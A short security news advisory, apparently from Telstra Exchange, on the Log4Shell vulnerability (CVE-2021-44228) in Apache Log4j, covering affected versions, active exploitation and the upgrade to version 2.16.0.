A severe security vulnerability in a widely used piece of software is posing a threat to organisations across the globe.
Cyber security experts are urging anyone who uses the Log4j Java open source logging library to update their systems to the latest version or apply a mitigation immediately.
The “Log4Shell” vulnerability (CVE-2021-44228, for Common Vulnerabilities and Exposures) is rated at 10/10 in severity because it allows for full control of a compromised server over the internet.
Hackers are already actively searching the internet for vulnerable systems as a result of this vulnerability, and quickly exploiting them, and authorities are warning that ransomware attacks using this method are likely.
The popular gaming platform Minecraft was the first to have been breached through the vulnerability; cyber criminals simply entered some malicious text into a game chat window.
Anyone using versions 2.0-beta9 to 2.14.1 of Log4J are affected. The exploitation also impacts default configurations of Apache frameworks like Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, among others, if they haven’t been updated to the latest version.
We’ve seen the type of damage that can be wrought through flaws in open source software like Apache before: the devastating 2017 breach of credit bureau Equifax – which saw the personal data of 148 million Americans and 15 million Britons compromised. This was perpetrated through a flaw in Apache Struts. Businesses are urged to update to the latest version of Log4Shell wherever it is used as soon as possible.
What is CVE-2021-44228 aka Log4shell?
Several days ago, security outlets and media started reporting on the discovery of a critical vulnerability in the Apache Log4j library, which is used by millions of organisations across the globe, both in their own internal software and the third-party products they use to run their operations.
CVE-2021-44228 – Log4j/Log4Shell can be easily exploited to take control of vulnerable systems remotely and we are aware hackers are actively scanning the internet for affected systems. The United States Cybersecurity and Infrastructure Security Agency issued an alert about the vulnerability on December 10th.
What systems are affected?
Systems and services that use the Java logging library, Apache log4j between versions 2.0-beta9 and 2.14.1.
How can I update or mitigate against the vulnerability?
The Apache Foundation has issued log4j version 2.16.0, which is not vulnerable to Log4Shell by default.
Source: Telstra Exchange